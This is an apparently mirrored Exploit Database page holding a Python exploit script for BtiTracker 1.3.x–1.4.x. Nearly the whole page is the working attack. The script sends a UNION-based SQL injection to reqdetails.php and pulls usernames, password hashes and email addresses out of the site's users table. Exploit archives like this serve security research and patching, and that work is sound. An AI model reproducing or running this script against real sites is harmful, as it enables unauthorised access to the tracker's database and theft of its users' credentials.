BtiTracker 1.3.x < 1.4.x - SQL Injection

• Exploit Database
• 116 阅读

• 作者： TinKode
  日期： 2010-06-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13807/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68

  #!/usr/bin/env python # ################################################################################ # ____________[ xpl0it ] # #/\___\/\_<code>\ __/\ \__# #\/_/\ \/ ___\ \,\L\_\ _____ _____ __ /\_\ \ ,_\____ # # \ \ \ /&apos; _ </code>\/_\__ \ /&apos;__<code>\ /&apos;___\/\ \/\ \/</code>&apos;__\/\ \ \ \/ /\ \/\ \# #\_\ \__/\ \/\ \/\ \L\ \/\__//\ \__/\ \ \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \ # #/\_____\ \_\ \_\ <code>\____\ \____\ \____\\ \____/\ \_\\ \_\ \__\\/</code>____ \# #\/_____/\/_/\/_/\/_____/\/____/\/____/ \/___/\/_/ \/_/\/__/ `/___/> \ # # _________________ /\___/ # # www.insecurity.ro \/__/# ## ################################################################################ #[ BtiTracker 1.3.X - 1.4.X Exploit ]# #Greetz: daemien, Sirgod, Puscas_Marin, AndrewBoy, Ras, HrN, vilches # #Greetz: excess, E.M.I.N.E.M, flo flow, paxnWo, begood, and ISR Staff# ################################################################################ # Because we care, we&apos;re security aware# ################################################################################   import sys, urllib2, re if len(sys.argv) < 2: print "===============================================================" print "============== BtiTracker 1.3.X - 1.4.X Exploit ===============" print "===============================================================" print "= Discovered and coded by TinKode =" print "= www.InSecurity.ro =" print "= =" print "= Local Command:=" print "= ./isr.py [http://webshit] [ID]=" print "= =" print "===============================================================" exit() if len(sys.argv) < 3: id = 1 else: id = sys.argv[2] shit = sys.argv[1] if shit[-1:] != "/": shit += "/" url = shit + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\ concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\ ,5,6,7,8,9,10+from+users+where+ID=" + str(id) + "--" print "\n" print "=============================================" print "================= InSecurity ================" print "=============================================" html = urllib2.urlopen(url).read() slobod = re.findall(r"--(.*)\:([0-9a-fA-F]{32})\:(.*)--", html) if len(slobod) > 0: print "ID : " + str(id) print "Username : " + slobod[0][0] print "Password : " + slobod[0][1] print "EMail: " + slobod[0][2] print "=============================================" print "================= InSecurity ================" print "=============================================" else: print "Ai luat-o la gaoaza..."   #InSecurity.ro - Romania